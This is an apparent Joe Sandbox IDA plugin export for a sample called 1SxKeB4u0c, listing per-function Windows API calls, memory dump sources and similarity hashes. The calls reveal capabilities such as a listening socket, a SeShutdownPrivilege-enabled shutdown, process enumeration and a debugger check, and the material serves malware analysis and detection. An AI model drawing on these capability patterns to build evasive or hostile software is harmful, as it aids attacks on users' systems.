• API ID: __itow__swprintf
• String ID: 3cA$_A
• API String ID: 674341424-3480954128
• Opcode ID: 05b7c7ee99c0cb033f712ee82ef3ace6076b9455ad682119e746beb70f6434ad
• Instruction ID: 703a96bf305cb9905ff3d3c25826e0fcfbd93ba8a00a4d78e9854e8314894fca
• Opcode Fuzzy Hash: 05b7c7ee99c0cb033f712ee82ef3ace6076b9455ad682119e746beb70f6434ad
• Instruction Fuzzy Hash: AB229B716083009FD724DF14C881BABB7E4AF85314F11492EF89A97392DB78E945CB9B
APIs
  • Part of subcall function 004587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
  • Part of subcall function 004587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
  • Part of subcall function 004587E1: GetLastError.KERNEL32 ref: 00458865
• ExitWindowsEx.USER32(?,00000000), ref: 004651F9
Strings
Memory Dump Source
• Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
Similarity
• API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
• String ID: $@$SeShutdownPrivilege
• API String ID: 2234035333-194228
• Opcode ID: 54329107cda8fc21248f4887d0b4108f88f23b4200919f0ee4a3738f6efa1ba1
• Instruction ID: a9b7a44e2451b6884de2a96c8f52f71cfd0e95415fa4985b61f57267d5601e10
• Opcode Fuzzy Hash: 54329107cda8fc21248f4887d0b4108f88f23b4200919f0ee4a3738f6efa1ba1
• Instruction Fuzzy Hash: D201F7317916116BF7286668ACAAFBB7358DB05345F2008BBFD03E21D2FD591C058A9F
APIs
• socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 004762DC
• WSAGetLastError.WSOCK32(00000000), ref: 004762EB
• bind.WSOCK32(00000000,?,00000010), ref: 00476307
• listen.WSOCK32(00000000,00000005), ref: 00476316
• WSAGetLastError.WSOCK32(00000000), ref: 00476330
• closesocket.WSOCK32(00000000,00000000), ref: 00476344
Memory Dump Source
• Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
Similarity
• API ID: ErrorLast$bindclosesocketlistensocket
• String ID:
• API String ID: 1279440585-0
• Opcode ID: 146cf2852e84b98676a1cb8b53444c853230e893978cbd9bf0c490d800ba36be
• Instruction ID: 9cc0b371228dcaf8913226d6fe42490e105b9b769aefcc5547ebbaeef9b3f94b
• Opcode Fuzzy Hash: 146cf2852e84b98676a1cb8b53444c853230e893978cbd9bf0c490d800ba36be
• Instruction Fuzzy Hash: 6521F2312006049FCB10FF64C845A6EB7BAEF44324F15856EEC1AA73D2C734AC05CB59
APIs
  • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
  • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
• _memmove.LIBCMT ref: 00450258
• _memmove.LIBCMT ref: 0045036D
• _memmove.LIBCMT ref: 00450414
Memory Dump Source
• Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
Similarity
• API ID: _memmove$Exception@8Throwstd::exception::exception
• String ID:
• API String ID: 1300846289-0
• Opcode ID: 0d99a971cadfccce3dc15f22f8639d8527b3cb7762ed4d8a1051c5a3262cee78
• Instruction ID: ce31bd404333394545349dab4fd8ad238969c684e33d592a62d2001407cdf1f6
• Opcode Fuzzy Hash: 0d99a971cadfccce3dc15f22f8639d8527b3cb7762ed4d8a1051c5a3262cee78
• Instruction Fuzzy Hash: 3202E270A00205DBCF04DF65D9816AEBBF5EF84304F54806EE80ADB392EB39D955CB99
APIs
  • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
• DefDlgProcW.USER32(?,?,?,?,?), ref: 004019FA
• GetSysColor.USER32(0000000F), ref: 00401A4E
• SetBkColor.GDI32(?,00000000), ref: 00401A61
  • Part of subcall function 00401290: DefDlgProcW.USER32(?,00000020,?), ref: 004012D8
Memory Dump Source
• Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
Similarity
• API ID: ColorProc$LongWindow
• String ID:
• API String ID: 3744519093-0
• Opcode ID: 8db6b4c7db5f97784a80f15b687025ec058e6c3025e7102d3aafc5b58ad8fc88
• Instruction ID: d041ec2a837aeb515327988813bafb0785b4d0a615f46c6b1421ede386c2745f
• Opcode Fuzzy Hash: 8db6b4c7db5f97784a80f15b687025ec058e6c3025e7102d3aafc5b58ad8fc88
• Instruction Fuzzy Hash: A4A124B1202544BAE629BA694C88F7F255CDF45345F14053FF602F62F2CA3C9D429ABE
APIs
  • Part of subcall function 00477D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00477DB6
• socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0047679E
• WSAGetLastError.WSOCK32(00000000), ref: 004767C7
• bind.WSOCK32(00000000,?,00000010), ref: 00476800
• WSAGetLastError.WSOCK32(00000000), ref: 0047680D
• closesocket.WSOCK32(00000000,00000000), ref: 00476821
Memory Dump Source
• Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
Similarity
• API ID: ErrorLast$bindclosesocketinet_addrsocket
• String ID:
• API String ID: 99427753-0
• Opcode ID: c3678cbd9f04907b78b21f7c60552e65a77e2ac58af8dde8cfff1331ff6b0f68
• Instruction ID: 4f4fa4b069b112be458f20050bee2991dabce79e459f6d74e9331a247e2dcb9e
• Opcode Fuzzy Hash: c3678cbd9f04907b78b21f7c60552e65a77e2ac58af8dde8cfff1331ff6b0f68
• Instruction Fuzzy Hash: E941D275A00600AFDB10BF258C86F6E77A89F45718F05C56EFA59BB3C3CA789D008799
APIs
Memory Dump Source
• Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
Similarity
• API ID: Window$EnabledForegroundIconicVisibleZoomed
• String ID:
• API String ID: 292994002-0
• Opcode ID: 7ffe818374d74fed162708100ced44c3bb0424a7746e5ca8e896d501ecac1497
• Instruction ID: 2bf7cd1b22f0a435aba1bf6783624a0e9851140f374647b9b1574053626a0f4e
• Opcode Fuzzy Hash: 7ffe818374d74fed162708100ced44c3bb0424a7746e5ca8e896d501ecac1497
• Instruction Fuzzy Hash: BB11B232700911ABEB217F269C44A6F7B99EF447A1B40483EFC45E3242DB789C0287AD
APIs
• GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004580C0
• GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004580CA
• GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004580D9
• HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004580E0
• GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004580F6
Memory Dump Source
• Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
Similarity
• API ID: HeapInformationToken$AllocErrorLastProcess
• String ID:
• API String ID: 44706859-0
• Opcode ID: 81dd5e2c95f6d95ffeb542e083d257e40e9b1a3105d490f338a4361df31bd442
• Instruction ID: 8dae455e1ba13099d0d58f164bb34b259a0b96a713bdc7d240504e0717c8d456
• Opcode Fuzzy Hash: 81dd5e2c95f6d95ffeb542e083d257e40e9b1a3105d490f338a4361df31bd442
• Instruction Fuzzy Hash: EBF08C30200614AFEB104FA4EC8CE6B3BACEF4A755B10043EF90592251DF649C09DB64
APIs
• CoInitialize.OLE32(00000000), ref: 0046C432
• CoCreateInstance.OLE32(00492D6C,00000000,00000001,00492BDC,?), ref: 0046C44A
  • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
• CoUninitialize.OLE32 ref: 0046C6B7
Strings
Memory Dump Source
• Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
Similarity
• API ID: CreateInitializeInstanceUninitialize_memmove
• String ID: .lnk
• API String ID: 2683427295-24824748
• Opcode ID: 2168bc15797479d4bf9d8be8a874f14214ce5ae81521c48187290a1a744f77cd
• Instruction ID: adb56a4b7a52abdaef05598002f92e73435f728c8d9d90c66f29e414dbdf6fe1
• Opcode Fuzzy Hash: 2168bc15797479d4bf9d8be8a874f14214ce5ae81521c48187290a1a744f77cd
• Instruction Fuzzy Hash: 5AA14AB1104205AFD700EF55C881EAFB7E8EF85308F00492EF595972A2EB75EE09CB56
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,00404AD0), ref: 00404B45
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00404B57
Strings
Memory Dump Source
• Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetNativeSystemInfo$kernel32.dll
• API String ID: 2574300362-192647395
• Opcode ID: a73fa7ec54199ac5cd1cc7a5405e6f37b5fe8d156d6918c0c451661c08ead94f
• Instruction ID: eac2b9657e48c1354d3ce07b29e145d4c0a45f8badf8df95cafcbf2a1bd35060
• Opcode Fuzzy Hash: a73fa7ec54199ac5cd1cc7a5405e6f37b5fe8d156d6918c0c451661c08ead94f
• Instruction Fuzzy Hash: 8ED01274A10713CFD720AF31D818B0A76E4AF45751B218C3F9485D6690D678F8C4C75C
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 0047EE3D
• Process32FirstW.KERNEL32(00000000,?), ref: 0047EE4B
  • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
• Process32NextW.KERNEL32(00000000,?), ref: 0047EF0B
• CloseHandle.KERNEL32(00000000,?,?,?), ref: 0047EF1A
Memory Dump Source
• Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
• String ID:
• API String ID: 2576544623-0
• Opcode ID: 89fde9512b94cb07eafd2aa5ff05997a94c0a9f5672a7c8b2447530929707f10
• Instruction ID: a98c0e68db7b9d45d0fd814aff1298f869d04e0007e226020b87bcf654703779
• Opcode Fuzzy Hash: 89fde9512b94cb07eafd2aa5ff05997a94c0a9f5672a7c8b2447530929707f10
• Instruction Fuzzy Hash: BB519171504300AFD310EF21CC85EABB7E8EF88714F10492EF595A72A1DB34AD08CB96
APIs
• lstrlenW.KERNEL32(?,?,?,00000000), ref: 0045E628
Strings
Memory Dump Source
• Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
Similarity
• API ID: lstrlen
• String ID: ($|
• API String ID: 1659193697-1631851259
• Opcode ID: 3acc6980ea9a46fe026d42f7af25ac09433a5617d8cc2724b3062d994903d747
• Instruction ID: d66d97c7bb63d5e7dad9b567a4e3f94d41a6da7275ee88609bc8c1bec3a8e44c
• Opcode Fuzzy Hash: 3acc6980ea9a46fe026d42f7af25ac09433a5617d8cc2724b3062d994903d747
• Instruction Fuzzy Hash: 21322675A007059FD728CF2AC481A6AB7F0FF48310B15C56EE89ADB3A2E774E941CB44
APIs
• InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0047180A,00000000), ref: 004723E1
• InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00472418
Memory Dump Source
• Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
Similarity
• API ID: Internet$AvailableDataFileQueryRead
• String ID:
• API String ID: 599397726-0
• Opcode ID: 5923bf182d8dffd8d0674baf8e47d7dcb5de1085cb5d3b6f392dad4e26dd05f6
• Instruction ID: 97e6fa55f52fdedc64eb36c533065f345fcd4e8e1beeb73d4f24c64f527f6271
• Opcode Fuzzy Hash: 5923bf182d8dffd8d0674baf8e47d7dcb5de1085cb5d3b6f392dad4e26dd05f6
• Instruction Fuzzy Hash: 0941DA71604205BFEB20DE65DE81EFB77BCEB40314F10806FFA49A6241DABC9E419658
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 02F51459
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02F51463
• UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,00000000), ref: 02F51470
Memory Dump Source
• Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
• Opcode ID: 89a86c2bbe518d311fcb17c981bdeee039990f4a55ed49ecbef6f4000b8461be
• Instruction ID: 9f3993d2ba61de090edb578e5774d96842736a12400d8346c4bd613dc184a6ea
• Opcode Fuzzy Hash: 89a86c2bbe518d311fcb17c981bdeee039990f4a55ed49ecbef6f4000b8461be
• Instruction Fuzzy Hash: AD31E574D0122CABCB21DF64DD8878DBBB8BF08350F5042EAEA1CA7250E7309B958F54
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0046B343
                                                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0046B39D
                                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0046B3EA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode$DiskFreeSpace
                                                                              • String ID:
                                                                              • API String ID: 1682464887-0
                                                                              • Opcode ID: e21071a1f309060a69139baf21bf0b81cefe721e06a6328ca3586a1a9a93214d
                                                                              • Instruction ID: 737ef1c34fd19c378388d330bbb387c55d680846c188baab6e7c30573ba64571
                                                                              • Opcode Fuzzy Hash: e21071a1f309060a69139baf21bf0b81cefe721e06a6328ca3586a1a9a93214d
                                                                              • Instruction Fuzzy Hash: 7D21AE75A10108EFCB00EFA5D880AEEBBB8FF48314F0080AAE905AB351DB359D59CB55
                                                                              APIs
                                                                                • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                                                                                • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
                                                                              • GetLastError.KERNEL32 ref: 00458865
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                              • String ID:
                                                                              • API String ID: 1922334811-0
                                                                              • Opcode ID: b7373a83a895d7e2e880dc15f24a8c97906aaff218fa00fb89185d783704a628
                                                                              • Instruction ID: 5e41a7b511489fb1457012ee205441660039eb57adee2e696ecce50f3e5e177b
                                                                              • Opcode Fuzzy Hash: b7373a83a895d7e2e880dc15f24a8c97906aaff218fa00fb89185d783704a628
                                                                              • Instruction Fuzzy Hash: 7511BFB2514204AFE718EFA4EC85D2BB7F8EB05315B60852EF85593212EF34BC448B64
                                                                              APIs
                                                                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00458774
                                                                              • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0045878B
                                                                              • FreeSid.ADVAPI32(?), ref: 0045879B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                              • String ID:
                                                                              • API String ID: 3429775523-0
                                                                              • Opcode ID: 008726f0c27652ffd03f151f72c22d205906185045b9f325022e2ab268aa6496
                                                                              • Instruction ID: 222101879978235e3db2a0a583f2c1bf244a93baf2b2f2d6b5292d8d16c370cf
                                                                              • Opcode Fuzzy Hash: 008726f0c27652ffd03f151f72c22d205906185045b9f325022e2ab268aa6496
                                                                              • Instruction Fuzzy Hash: 4CF04F7591130CBFDF00DFF4DC89AAEB7BCEF09201F104879A901E2181D7756A088B54
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(00000003,?,02F53F13,00000003,02F6DE80,0000000C,02F5403D,00000003,00000002,00000000,?,02F52038,00000003), ref: 02F53F5E
                                                                              • TerminateProcess.KERNEL32(00000000,?,02F53F13,00000003,02F6DE80,0000000C,02F5403D,00000003,00000002,00000000,?,02F52038,00000003), ref: 02F53F65
                                                                              • ExitProcess.KERNEL32 ref: 02F53F77
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Process$CurrentExitTerminate
                                                                              • String ID:
                                                                              • API String ID: 1703294689-0
                                                                              • Opcode ID: 2399a43aecf83fb1815cdbab783fdd7d7be8e5b6e390a0eab656336467315c67
                                                                              • Instruction ID: 9274c56444b8015bf360e39b05a220abd1c26c5af4701af0bb02b7b2cae0155e
                                                                              • Opcode Fuzzy Hash: 2399a43aecf83fb1815cdbab783fdd7d7be8e5b6e390a0eab656336467315c67
